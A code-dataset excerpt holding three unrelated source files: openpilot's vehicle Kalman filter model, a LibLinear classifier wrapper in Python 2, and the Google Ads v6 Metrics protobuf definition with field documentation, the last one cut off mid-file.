repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
commaai/openpilot | selfdrive/locationd/models/car_kf.py | 1 | 4757 | #!/usr/bin/env python3
import math
import sys
from typing import Any, Dict
import numpy as np
from selfdrive.locationd.models.constants import ObservationKind
from selfdrive.swaglog import cloudlog
from rednose.helpers.kalmanfilter import KalmanFilter
if __name__ == '__main__': # Generating sympy
import sympy as sp
from rednose.helpers.ekf_sym import gen_code
else:
from rednose.helpers.ekf_sym_pyx import EKF_sym # pylint: disable=no-name-in-module, import-error
i = 0
def _slice(n):
global i
s = slice(i, i + n)
i += n
return s
class States():
# Vehicle model params
STIFFNESS = _slice(1) # [-]
STEER_RATIO = _slice(1) # [-]
ANGLE_OFFSET = _slice(1) # [rad]
ANGLE_OFFSET_FAST = _slice(1) # [rad]
VELOCITY = _slice(2) # (x, y) [m/s]
YAW_RATE = _slice(1) # [rad/s]
STEER_ANGLE = _slice(1) # [rad]
class CarKalman(KalmanFilter):
name = 'car'
initial_x = np.array([
1.0,
15.0,
0.0,
0.0,
10.0, 0.0,
0.0,
0.0,
])
# process noise
Q = np.diag([
(.05 / 100)**2,
.01**2,
math.radians(0.02)**2,
math.radians(0.25)**2,
.1**2, .01**2,
math.radians(0.1)**2,
math.radians(0.1)**2,
])
P_initial = Q.copy()
obs_noise: Dict[int, Any] = {
ObservationKind.STEER_ANGLE: np.atleast_2d(math.radians(0.01)**2),
ObservationKind.ANGLE_OFFSET_FAST: np.atleast_2d(math.radians(10.0)**2),
ObservationKind.STEER_RATIO: np.atleast_2d(5.0**2),
ObservationKind.STIFFNESS: np.atleast_2d(5.0**2),
ObservationKind.ROAD_FRAME_X_SPEED: np.atleast_2d(0.1**2),
}
global_vars = [
'mass',
'rotational_inertia',
'center_to_front',
'center_to_rear',
'stiffness_front',
'stiffness_rear',
]
@staticmethod
def generate_code(generated_dir):
dim_state = CarKalman.initial_x.shape[0]
name = CarKalman.name
# vehicle models comes from The Science of Vehicle Dynamics: Handling, Braking, and Ride of Road and Race Cars
# Model used is in 6.15 with formula from 6.198
# globals
global_vars = [sp.Symbol(name) for name in CarKalman.global_vars]
m, j, aF, aR, cF_orig, cR_orig = global_vars
# make functions and jacobians with sympy
# state variables
state_sym = sp.MatrixSymbol('state', dim_state, 1)
state = sp.Matrix(state_sym)
# Vehicle model constants
x = state[States.STIFFNESS, :][0, 0]
cF, cR = x * cF_orig, x * cR_orig
angle_offset = state[States.ANGLE_OFFSET, :][0, 0]
angle_offset_fast = state[States.ANGLE_OFFSET_FAST, :][0, 0]
sa = state[States.STEER_ANGLE, :][0, 0]
sR = state[States.STEER_RATIO, :][0, 0]
u, v = state[States.VELOCITY, :]
r = state[States.YAW_RATE, :][0, 0]
A = sp.Matrix(np.zeros((2, 2)))
A[0, 0] = -(cF + cR) / (m * u)
A[0, 1] = -(cF * aF - cR * aR) / (m * u) - u
A[1, 0] = -(cF * aF - cR * aR) / (j * u)
A[1, 1] = -(cF * aF**2 + cR * aR**2) / (j * u)
B = sp.Matrix(np.zeros((2, 1)))
B[0, 0] = cF / m / sR
B[1, 0] = (cF * aF) / j / sR
x = sp.Matrix([v, r]) # lateral velocity, yaw rate
x_dot = A * x + B * (sa - angle_offset - angle_offset_fast)
dt = sp.Symbol('dt')
state_dot = sp.Matrix(np.zeros((dim_state, 1)))
state_dot[States.VELOCITY.start + 1, 0] = x_dot[0]
state_dot[States.YAW_RATE.start, 0] = x_dot[1]
# Basic descretization, 1st order integrator
# Can be pretty bad if dt is big
f_sym = state + dt * state_dot
#
# Observation functions
#
obs_eqs = [
[sp.Matrix([r]), ObservationKind.ROAD_FRAME_YAW_RATE, None],
[sp.Matrix([u, v]), ObservationKind.ROAD_FRAME_XY_SPEED, None],
[sp.Matrix([u]), ObservationKind.ROAD_FRAME_X_SPEED, None],
[sp.Matrix([sa]), ObservationKind.STEER_ANGLE, None],
[sp.Matrix([angle_offset_fast]), ObservationKind.ANGLE_OFFSET_FAST, None],
[sp.Matrix([sR]), ObservationKind.STEER_RATIO, None],
[sp.Matrix([x]), ObservationKind.STIFFNESS, None],
]
gen_code(generated_dir, name, f_sym, dt, state_sym, obs_eqs, dim_state, dim_state, global_vars=global_vars)
def __init__(self, generated_dir, steer_ratio=15, stiffness_factor=1, angle_offset=0): # pylint: disable=super-init-not-called
dim_state = self.initial_x.shape[0]
dim_state_err = self.P_initial.shape[0]
x_init = self.initial_x
x_init[States.STEER_RATIO] = steer_ratio
x_init[States.STIFFNESS] = stiffness_factor
x_init[States.ANGLE_OFFSET] = angle_offset
# init filter
self.filter = EKF_sym(generated_dir, self.name, self.Q, self.initial_x, self.P_initial, dim_state, dim_state_err, global_vars=self.global_vars, logger=cloudlog)
if __name__ == "__main__":
generated_dir = sys.argv[2]
CarKalman.generate_code(generated_dir)
| mit | 7,562,025,558,407,216,000 | 27.656627 | 164 | 0.615304 | false |
excelly/xpy-ml | ex/ml/liblinear.py | 1 | 3853 | from common import *
import ex.ml.libsvm.linearutil as lu
def a2l(X, y = None):
'''convert arrays to list
'''
if y is not None:
y = y.tolist()
if issparse(X):
X = [dict(zip(find(row)[1], row.data)) for row in X]
else:
X = X.tolist()
if y is not None:
return (X, y)
else:
return X
class LibLinear:
'''liblinear
'''
def __init(self):
self.n, self.dim, self.options, self.model, self.ulabels, self.preproc_param = [None]*6
def Train(self, X, y, options = None):
''' train libsvm model
'''
# process labels
y = int32(y)
self.ulabels = unique(y)
K = len(self.ulabels)
check(K > 1, 'needs at least 2 classes')
y = EncodeArray(y, self.ulabels)
# process features
self.n, self.dim = X.shape
X, self.preproc_param = Normalize(X, '+-1', 'col')
# train
X, y = a2l(X, y)
if options is None: # default parameter
options = ''
self.model = lu.train(y, X, options + ' -B 1 -q')
def Predict(self, X):
''' predict for test data
'''
# apply preprocessing
X = Normalize(X, self.preproc_param, 'col')[0]
X = a2l(X)
t, acc, P = lu.predict(zeros(len(X), dtype = int32), X, self.model, '')
t = arr(t, dtype = 'int32')
P = arr(P)
# extract results
t = self.ulabels[t]
p=P.max(1)
return (t, p, P)
def CV(self, nfolds, X, y, options = None, verbose = True, poolsize = 1):
''' get cross-validation performance
'''
cvo = CVObject(y.size, nfolds)
if verbose:
log.info('Cross-validating MultiLogistic. Data = {0}'.format(X.shape))
log.info(cvo)
trI, teI, perf = cvo.CV(ipred, X, y, options, poolsize)
t, p = unzip(perf)
idx = arr(Flatten(teI))
t = arr(Flatten(t), int32)
p = arr(Flatten(p))
t[idx]=t.copy()
p[idx]=p.copy()
return (t, p)
def Clone(self):
return deepcopy(self)
def Save(self, filename):
SavePickle(filename, self)
def Load(self, filename):
o=LoadPickles(filename)
Copy(o, self)
def Plot(self, xlim, ylim, color = 'label', gridsize = 50):
'''plot the current classifier
'''
check(self.dim == 2, 'can only plot in 2-D space')
X, Y = MeshGrid(linspace(xlim[0], xlim[1], gridsize),
linspace(ylim[0], ylim[1], gridsize))
F = hstack((col(X), col(Y)))
y, p = self.Predict(F)[:2]
if color == 'label':
scatter(X.ravel(), Y.ravel(), c = y, edgecolors = 'none')
elif color == 'prob':
scatter(X.ravel(), Y.ravel(), c = p, vmin = 0, vmax = 1, edgecolors = 'none')
draw()
def ipred(trI, teI, X, y, options):
'''used for cross validation
'''
model = LibLinear()
model.Train(X[trI], y[trI], options)
t, p, P = model.Predict(X[teI])
return (t.tolist(), p.tolist())
if __name__ == '__main__':
InitLog()
n = 100
pts = vstack((repmat(linspace(-1, 1, n/2), (1, 2)),
hstack((sin(linspace(0, 10, n/2)) + 1, sin(linspace(0, 10, n/2)) - 1)))).T
y = cat((ones(n/2)*3, ones(n/2)*7))
model = LibLinear()
t, p = model.CV(10, pts, y)
acc = (t == y).mean()
print '** Acc: %f' % acc
test(acc > 0.95, "LibSVM Train & Test & CV")
model.Train(pts, y)
t, p, P = model.Predict(pts)
acc = (y == t).mean()
print '** Acc: %f' % acc
subplot(gcf(), 131);
plot(pts[:,0], pts[:,1], '+')
subplot(gcf(), 132)
model.Plot(GetRange(pts[:,0]), GetRange(pts[:,1]), 'label', 100)
subplot(gcf(), 133)
model.Plot(GetRange(pts[:,0]), GetRange(pts[:,1]), 'prob', 100)
show()
| apache-2.0 | -1,892,333,781,465,634,600 | 24.516556 | 95 | 0.509473 | false |
googleads/google-ads-python | google/ads/googleads/v6/common/types/metrics.py | 1 | 42787 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v6.enums.types import interaction_event_type
from google.ads.googleads.v6.enums.types import quality_score_bucket
__protobuf__ = proto.module(
package="google.ads.googleads.v6.common",
marshal="google.ads.googleads.v6",
manifest={"Metrics",},
)
class Metrics(proto.Message):
r"""Metrics data.
Attributes:
absolute_top_impression_percentage (float):
The percent of your ad impressions that are
shown as the very first ad above the organic
search results.
active_view_cpm (float):
Average cost of viewable impressions
(``active_view_impressions``).
active_view_ctr (float):
Active view measurable clicks divided by
active view viewable impressions. This metric is
reported only for display network.
active_view_impressions (int):
A measurement of how often your ad has become
viewable on a Display Network site.
active_view_measurability (float):
The ratio of impressions that could be
measured by Active View over the number of
served impressions.
active_view_measurable_cost_micros (int):
The cost of the impressions you received that
were measurable by Active View.
active_view_measurable_impressions (int):
The number of times your ads are appearing on
placements in positions where they can be seen.
active_view_viewability (float):
The percentage of time when your ad appeared
on an Active View enabled site (measurable
impressions) and was viewable (viewable
impressions).
all_conversions_from_interactions_rate (float):
All conversions from interactions (as oppose
to view through conversions) divided by the
number of ad interactions.
all_conversions_value (float):
The value of all conversions.
all_conversions_value_by_conversion_date (float):
The value of all conversions. When this column is selected
with date, the values in date column means the conversion
date. Details for the by_conversion_date columns are
available at
https://support.google.com/google-ads/answer/9549009.
all_conversions (float):
The total number of conversions. This includes all
conversions regardless of the value of
include_in_conversions_metric.
all_conversions_by_conversion_date (float):
The total number of conversions. This includes all
conversions regardless of the value of
include_in_conversions_metric. When this column is selected
with date, the values in date column means the conversion
date. Details for the by_conversion_date columns are
available at
https://support.google.com/google-ads/answer/9549009.
all_conversions_value_per_cost (float):
The value of all conversions divided by the
total cost of ad interactions (such as clicks
for text ads or views for video ads).
all_conversions_from_click_to_call (float):
The number of times people clicked the "Call"
button to call a store during or after clicking
an ad. This number doesn't include whether or
not calls were connected, or the duration of any
calls. This metric applies to feed items only.
all_conversions_from_directions (float):
The number of times people clicked a "Get
directions" button to navigate to a store after
clicking an ad. This metric applies to feed
items only.
all_conversions_from_interactions_value_per_interaction (float):
The value of all conversions from
interactions divided by the total number of
interactions.
all_conversions_from_menu (float):
The number of times people clicked a link to
view a store's menu after clicking an ad.
This metric applies to feed items only.
all_conversions_from_order (float):
The number of times people placed an order at
a store after clicking an ad. This metric
applies to feed items only.
all_conversions_from_other_engagement (float):
The number of other conversions (for example,
posting a review or saving a location for a
store) that occurred after people clicked an ad.
This metric applies to feed items only.
all_conversions_from_store_visit (float):
Estimated number of times people visited a
store after clicking an ad. This metric applies
to feed items only.
all_conversions_from_store_website (float):
The number of times that people were taken to
a store's URL after clicking an ad.
This metric applies to feed items only.
average_cost (float):
The average amount you pay per interaction.
This amount is the total cost of your ads
divided by the total number of interactions.
average_cpc (float):
The total cost of all clicks divided by the
total number of clicks received.
average_cpe (float):
The average amount that you've been charged
for an ad engagement. This amount is the total
cost of all ad engagements divided by the total
number of ad engagements.
average_cpm (float):
Average cost-per-thousand impressions (CPM).
average_cpv (float):
The average amount you pay each time someone
views your ad. The average CPV is defined by the
total cost of all ad views divided by the number
of views.
average_page_views (float):
Average number of pages viewed per session.
average_time_on_site (float):
Total duration of all sessions (in seconds) /
number of sessions. Imported from Google
Analytics.
benchmark_average_max_cpc (float):
An indication of how other advertisers are
bidding on similar products.
benchmark_ctr (float):
An indication on how other advertisers'
Shopping ads for similar products are performing
based on how often people who see their ad click
on it.
bounce_rate (float):
Percentage of clicks where the user only
visited a single page on your site. Imported
from Google Analytics.
clicks (int):
The number of clicks.
combined_clicks (int):
The number of times your ad or your site's
listing in the unpaid results was clicked. See
the help page at
https://support.google.com/google-
ads/answer/3097241 for details.
combined_clicks_per_query (float):
The number of times your ad or your site's listing in the
unpaid results was clicked (combined_clicks) divided by
combined_queries. See the help page at
https://support.google.com/google-ads/answer/3097241 for
details.
combined_queries (int):
The number of searches that returned pages
from your site in the unpaid results or showed
one of your text ads. See the help page at
https://support.google.com/google-
ads/answer/3097241 for details.
content_budget_lost_impression_share (float):
The estimated percent of times that your ad
was eligible to show on the Display Network but
didn't because your budget was too low. Note:
Content budget lost impression share is reported
in the range of 0 to 0.9. Any value above 0.9 is
reported as 0.9001.
content_impression_share (float):
The impressions you've received on the
Display Network divided by the estimated number
of impressions you were eligible to receive.
Note: Content impression share is reported in
the range of 0.1 to 1. Any value below 0.1 is
reported as 0.0999.
conversion_last_received_request_date_time (str):
The last date/time a conversion tag for this
conversion action successfully fired and was
seen by Google Ads. This firing event may not
have been the result of an attributable
conversion (e.g. because the tag was fired from
a browser that did not previously click an ad
from an appropriate advertiser). The date/time
is in the customer's time zone.
conversion_last_conversion_date (str):
The date of the most recent conversion for
this conversion action. The date is in the
customer's time zone.
content_rank_lost_impression_share (float):
The estimated percentage of impressions on
the Display Network that your ads didn't receive
due to poor Ad Rank. Note: Content rank lost
impression share is reported in the range of 0
to 0.9. Any value above 0.9 is reported as
0.9001.
conversions_from_interactions_rate (float):
Conversions from interactions divided by the number of ad
interactions (such as clicks for text ads or views for video
ads). This only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
conversions_value (float):
The value of conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
conversions_value_by_conversion_date (float):
The value of conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions. When this
column is selected with date, the values in date column
means the conversion date. Details for the
by_conversion_date columns are available at
https://support.google.com/google-ads/answer/9549009.
conversions_value_per_cost (float):
The value of conversions divided by the cost of ad
interactions. This only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
conversions_from_interactions_value_per_interaction (float):
The value of conversions from interactions divided by the
number of ad interactions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
conversions (float):
The number of conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
conversions_by_conversion_date (float):
The number of conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions. When this
column is selected with date, the values in date column
means the conversion date. Details for the
by_conversion_date columns are available at
https://support.google.com/google-ads/answer/9549009.
cost_micros (int):
The sum of your cost-per-click (CPC) and
cost-per-thousand impressions (CPM) costs during
this period.
cost_per_all_conversions (float):
The cost of ad interactions divided by all
conversions.
cost_per_conversion (float):
The cost of ad interactions divided by conversions. This
only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
cost_per_current_model_attributed_conversion (float):
The cost of ad interactions divided by current model
attributed conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
cross_device_conversions (float):
Conversions from when a customer clicks on a Google Ads ad
on one device, then converts on a different device or
browser. Cross-device conversions are already included in
all_conversions.
ctr (float):
The number of clicks your ad receives
(Clicks) divided by the number of times your ad
is shown (Impressions).
current_model_attributed_conversions (float):
Shows how your historic conversions data would look under
the attribution model you've currently selected. This only
includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
current_model_attributed_conversions_from_interactions_rate (float):
Current model attributed conversions from interactions
divided by the number of ad interactions (such as clicks for
text ads or views for video ads). This only includes
conversion actions which include_in_conversions_metric
attribute is set to true. If you use conversion-based
bidding, your bid strategies will optimize for these
conversions.
current_model_attributed_conversions_from_interactions_value_per_interaction (float):
The value of current model attributed conversions from
interactions divided by the number of ad interactions. This
only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
current_model_attributed_conversions_value (float):
The value of current model attributed conversions. This only
includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
current_model_attributed_conversions_value_per_cost (float):
The value of current model attributed conversions divided by
the cost of ad interactions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
engagement_rate (float):
How often people engage with your ad after
it's shown to them. This is the number of ad
expansions divided by the number of times your
ad is shown.
engagements (int):
The number of engagements.
An engagement occurs when a viewer expands your
Lightbox ad. Also, in the future, other ad types
may support engagement metrics.
hotel_average_lead_value_micros (float):
Average lead value based on clicks.
hotel_price_difference_percentage (float):
The average price difference between the
price offered by reporting hotel advertiser and
the cheapest price offered by the competing
advertiser.
hotel_eligible_impressions (int):
The number of impressions that hotel partners
could have had given their feed performance.
historical_creative_quality_score (google.ads.googleads.v6.enums.types.QualityScoreBucketEnum.QualityScoreBucket):
The creative historical quality score.
historical_landing_page_quality_score (google.ads.googleads.v6.enums.types.QualityScoreBucketEnum.QualityScoreBucket):
The quality of historical landing page
experience.
historical_quality_score (int):
The historical quality score.
historical_search_predicted_ctr (google.ads.googleads.v6.enums.types.QualityScoreBucketEnum.QualityScoreBucket):
The historical search predicted click through
rate (CTR).
gmail_forwards (int):
The number of times the ad was forwarded to
someone else as a message.
gmail_saves (int):
The number of times someone has saved your
Gmail ad to their inbox as a message.
gmail_secondary_clicks (int):
The number of clicks to the landing page on
the expanded state of Gmail ads.
impressions_from_store_reach (int):
The number of times a store's location-based
ad was shown. This metric applies to feed items
only.
impressions (int):
Count of how often your ad has appeared on a
search results page or website on the Google
Network.
interaction_rate (float):
How often people interact with your ad after
it is shown to them. This is the number of
interactions divided by the number of times your
ad is shown.
interactions (int):
The number of interactions.
An interaction is the main user action
associated with an ad format-clicks for text and
shopping ads, views for video ads, and so on.
interaction_event_types (Sequence[google.ads.googleads.v6.enums.types.InteractionEventTypeEnum.InteractionEventType]):
The types of payable and free interactions.
invalid_click_rate (float):
The percentage of clicks filtered out of your
total number of clicks (filtered + non-filtered
clicks) during the reporting period.
invalid_clicks (int):
Number of clicks Google considers
illegitimate and doesn't charge you for.
message_chats (int):
Number of message chats initiated for Click
To Message impressions that were message
tracking eligible.
message_impressions (int):
Number of Click To Message impressions that
were message tracking eligible.
message_chat_rate (float):
Number of message chats initiated (message_chats) divided by
the number of message impressions (message_impressions).
Rate at which a user initiates a message chat from an ad
impression with a messaging option and message tracking
enabled. Note that this rate can be more than 1.0 for a
given message impression.
mobile_friendly_clicks_percentage (float):
The percentage of mobile clicks that go to a
mobile-friendly page.
organic_clicks (int):
The number of times someone clicked your
site's listing in the unpaid results for a
particular query. See the help page at
https://support.google.com/google-
ads/answer/3097241 for details.
organic_clicks_per_query (float):
The number of times someone clicked your site's listing in
the unpaid results (organic_clicks) divided by the total
number of searches that returned pages from your site
(organic_queries). See the help page at
https://support.google.com/google-ads/answer/3097241 for
details.
organic_impressions (int):
The number of listings for your site in the
unpaid search results. See the help page at
https://support.google.com/google-
ads/answer/3097241 for details.
organic_impressions_per_query (float):
The number of times a page from your site was listed in the
unpaid search results (organic_impressions) divided by the
number of searches returning your site's listing in the
unpaid results (organic_queries). See the help page at
https://support.google.com/google-ads/answer/3097241 for
details.
organic_queries (int):
The total number of searches that returned
your site's listing in the unpaid results. See
the help page at
https://support.google.com/google-
ads/answer/3097241 for details.
percent_new_visitors (float):
Percentage of first-time sessions (from
people who had never visited your site before).
Imported from Google Analytics.
phone_calls (int):
Number of offline phone calls.
phone_impressions (int):
Number of offline phone impressions.
phone_through_rate (float):
Number of phone calls received (phone_calls) divided by the
number of times your phone number is shown
(phone_impressions).
relative_ctr (float):
Your clickthrough rate (Ctr) divided by the
average clickthrough rate of all advertisers on
the websites that show your ads. Measures how
your ads perform on Display Network sites
compared to other ads on the same sites.
search_absolute_top_impression_share (float):
The percentage of the customer's Shopping or
Search ad impressions that are shown in the most
prominent Shopping position. See
https://support.google.com/google-
ads/answer/7501826 for details. Any value below
0.1 is reported as 0.0999.
search_budget_lost_absolute_top_impression_share (float):
The number estimating how often your ad
wasn't the very first ad above the organic
search results due to a low budget. Note: Search
budget lost absolute top impression share is
reported in the range of 0 to 0.9. Any value
above 0.9 is reported as 0.9001.
search_budget_lost_impression_share (float):
The estimated percent of times that your ad
was eligible to show on the Search Network but
didn't because your budget was too low. Note:
Search budget lost impression share is reported
in the range of 0 to 0.9. Any value above 0.9 is
reported as 0.9001.
search_budget_lost_top_impression_share (float):
The number estimating how often your ad
didn't show anywhere above the organic search
results due to a low budget. Note: Search budget
lost top impression share is reported in the
range of 0 to 0.9. Any value above 0.9 is
reported as 0.9001.
search_click_share (float):
The number of clicks you've received on the
Search Network divided by the estimated number
of clicks you were eligible to receive. Note:
Search click share is reported in the range of
0.1 to 1. Any value below 0.1 is reported as
0.0999.
search_exact_match_impression_share (float):
The impressions you've received divided by
the estimated number of impressions you were
eligible to receive on the Search Network for
search terms that matched your keywords exactly
(or were close variants of your keyword),
regardless of your keyword match types. Note:
Search exact match impression share is reported
in the range of 0.1 to 1. Any value below 0.1 is
reported as 0.0999.
search_impression_share (float):
The impressions you've received on the Search
Network divided by the estimated number of
impressions you were eligible to receive. Note:
Search impression share is reported in the range
of 0.1 to 1. Any value below 0.1 is reported as
0.0999.
search_rank_lost_absolute_top_impression_share (float):
The number estimating how often your ad
wasn't the very first ad above the organic
search results due to poor Ad Rank. Note: Search
rank lost absolute top impression share is
reported in the range of 0 to 0.9. Any value
above 0.9 is reported as 0.9001.
search_rank_lost_impression_share (float):
The estimated percentage of impressions on
the Search Network that your ads didn't receive
due to poor Ad Rank. Note: Search rank lost
impression share is reported in the range of 0
to 0.9. Any value above 0.9 is reported as
0.9001.
search_rank_lost_top_impression_share (float):
The number estimating how often your ad
didn't show anywhere above the organic search
results due to poor Ad Rank. Note: Search rank
lost top impression share is reported in the
range of 0 to 0.9. Any value above 0.9 is
reported as 0.9001.
search_top_impression_share (float):
The impressions you've received in the top
location (anywhere above the organic search
results) compared to the estimated number of
impressions you were eligible to receive in the
top location. Note: Search top impression share
is reported in the range of 0.1 to 1. Any value
below 0.1 is reported as 0.0999.
speed_score (int):
A measure of how quickly your page loads
after clicks on your mobile ads. The score is a
range from 1 to 10, 10 being the fastest.
top_impression_percentage (float):
The percent of your ad impressions that are
shown anywhere above the organic search results.
valid_accelerated_mobile_pages_clicks_percentage (float):
The percentage of ad clicks to Accelerated
Mobile Pages (AMP) landing pages that reach a
valid AMP page.
value_per_all_conversions (float):
The value of all conversions divided by the
number of all conversions.
value_per_all_conversions_by_conversion_date (float):
The value of all conversions divided by the number of all
conversions. When this column is selected with date, the
values in date column means the conversion date. Details for
the by_conversion_date columns are available at
https://support.google.com/google-ads/answer/9549009.
value_per_conversion (float):
The value of conversions divided by the number of
conversions. This only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
value_per_conversions_by_conversion_date (float):
The value of conversions divided by the number of
conversions. This only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions. When this column is selected
with date, the values in date column means the conversion
date. Details for the by_conversion_date columns are
available at
https://support.google.com/google-ads/answer/9549009.
value_per_current_model_attributed_conversion (float):
The value of current model attributed conversions divided by
the number of the conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
video_quartile_p100_rate (float):
Percentage of impressions where the viewer
watched all of your video.
video_quartile_p25_rate (float):
Percentage of impressions where the viewer
watched 25% of your video.
video_quartile_p50_rate (float):
Percentage of impressions where the viewer
watched 50% of your video.
video_quartile_p75_rate (float):
Percentage of impressions where the viewer
watched 75% of your video.
video_view_rate (float):
The number of views your TrueView video ad
receives divided by its number of impressions,
including thumbnail impressions for TrueView in-
display ads.
video_views (int):
The number of times your video ads were
viewed.
view_through_conversions (int):
The total number of view-through conversions.
These happen when a customer sees an image or
rich media ad, then later completes a conversion
on your site without interacting with (e.g.,
clicking on) another ad.
"""
absolute_top_impression_percentage = proto.Field(
proto.DOUBLE, number=183, optional=True
)
active_view_cpm = proto.Field(proto.DOUBLE, number=184, optional=True)
active_view_ctr = proto.Field(proto.DOUBLE, number=185, optional=True)
active_view_impressions = proto.Field(
proto.INT64, number=186, optional=True
)
active_view_measurability = proto.Field(
proto.DOUBLE, number=187, optional=True
)
active_view_measurable_cost_micros = proto.Field(
proto.INT64, number=188, optional=True
)
active_view_measurable_impressions = proto.Field(
proto.INT64, number=189, optional=True
)
active_view_viewability = proto.Field(
proto.DOUBLE, number=190, optional=True
)
all_conversions_from_interactions_rate = proto.Field(
proto.DOUBLE, number=191, optional=True
)
all_conversions_value = proto.Field(proto.DOUBLE, number=192, optional=True)
all_conversions_value_by_conversion_date = proto.Field(
proto.DOUBLE, number=240
)
all_conversions = proto.Field(proto.DOUBLE, number=193, optional=True)
all_conversions_by_conversion_date = proto.Field(proto.DOUBLE, number=241)
all_conversions_value_per_cost = proto.Field(
proto.DOUBLE, number=194, optional=True
)
all_conversions_from_click_to_call = proto.Field(
proto.DOUBLE, number=195, optional=True
)
all_conversions_from_directions = proto.Field(
proto.DOUBLE, number=196, optional=True
)
all_conversions_from_interactions_value_per_interaction = proto.Field(
proto.DOUBLE, number=197, optional=True
)
all_conversions_from_menu = proto.Field(
proto.DOUBLE, number=198, optional=True
)
all_conversions_from_order = proto.Field(
proto.DOUBLE, number=199, optional=True
)
all_conversions_from_other_engagement = proto.Field(
proto.DOUBLE, number=200, optional=True
)
all_conversions_from_store_visit = proto.Field(
proto.DOUBLE, number=201, optional=True
)
all_conversions_from_store_website = proto.Field(
proto.DOUBLE, number=202, optional=True
)
average_cost = proto.Field(proto.DOUBLE, number=203, optional=True)
average_cpc = proto.Field(proto.DOUBLE, number=204, optional=True)
average_cpe = proto.Field(proto.DOUBLE, number=205, optional=True)
average_cpm = proto.Field(proto.DOUBLE, number=206, optional=True)
average_cpv = proto.Field(proto.DOUBLE, number=207, optional=True)
average_page_views = proto.Field(proto.DOUBLE, number=208, optional=True)
average_time_on_site = proto.Field(proto.DOUBLE, number=209, optional=True)
benchmark_average_max_cpc = proto.Field(
proto.DOUBLE, number=210, optional=True
)
benchmark_ctr = proto.Field(proto.DOUBLE, number=211, optional=True)
bounce_rate = proto.Field(proto.DOUBLE, number=212, optional=True)
clicks = proto.Field(proto.INT64, number=131, optional=True)
combined_clicks = proto.Field(proto.INT64, number=156, optional=True)
combined_clicks_per_query = proto.Field(
proto.DOUBLE, number=157, optional=True
)
combined_queries = proto.Field(proto.INT64, number=158, optional=True)
content_budget_lost_impression_share = proto.Field(
proto.DOUBLE, number=159, optional=True
)
content_impression_share = proto.Field(
proto.DOUBLE, number=160, optional=True
)
conversion_last_received_request_date_time = proto.Field(
proto.STRING, number=161, optional=True
)
conversion_last_conversion_date = proto.Field(
proto.STRING, number=162, optional=True
)
content_rank_lost_impression_share = proto.Field(
proto.DOUBLE, number=163, optional=True
)
conversions_from_interactions_rate = proto.Field(
proto.DOUBLE, number=164, optional=True
)
conversions_value = proto.Field(proto.DOUBLE, number=165, optional=True)
conversions_value_by_conversion_date = proto.Field(proto.DOUBLE, number=242)
conversions_value_per_cost = proto.Field(
proto.DOUBLE, number=166, optional=True
)
conversions_from_interactions_value_per_interaction = proto.Field(
proto.DOUBLE, number=167, optional=True
)
conversions = proto.Field(proto.DOUBLE, number=168, optional=True)
conversions_by_conversion_date = proto.Field(proto.DOUBLE, number=243)
cost_micros = proto.Field(proto.INT64, number=169, optional=True)
cost_per_all_conversions = proto.Field(
proto.DOUBLE, number=170, optional=True
)
cost_per_conversion = proto.Field(proto.DOUBLE, number=171, optional=True)
cost_per_current_model_attributed_conversion = proto.Field(
proto.DOUBLE, number=172, optional=True
)
cross_device_conversions = proto.Field(
proto.DOUBLE, number=173, optional=True
)
ctr = proto.Field(proto.DOUBLE, number=174, optional=True)
current_model_attributed_conversions = proto.Field(
proto.DOUBLE, number=175, optional=True
)
current_model_attributed_conversions_from_interactions_rate = proto.Field(
proto.DOUBLE, number=176, optional=True
)
current_model_attributed_conversions_from_interactions_value_per_interaction = proto.Field(
proto.DOUBLE, number=177, optional=True
)
current_model_attributed_conversions_value = proto.Field(
proto.DOUBLE, number=178, optional=True
)
current_model_attributed_conversions_value_per_cost = proto.Field(
proto.DOUBLE, number=179, optional=True
)
engagement_rate = proto.Field(proto.DOUBLE, number=180, optional=True)
engagements = proto.Field(proto.INT64, number=181, optional=True)
hotel_average_lead_value_micros = proto.Field(
proto.DOUBLE, number=213, optional=True
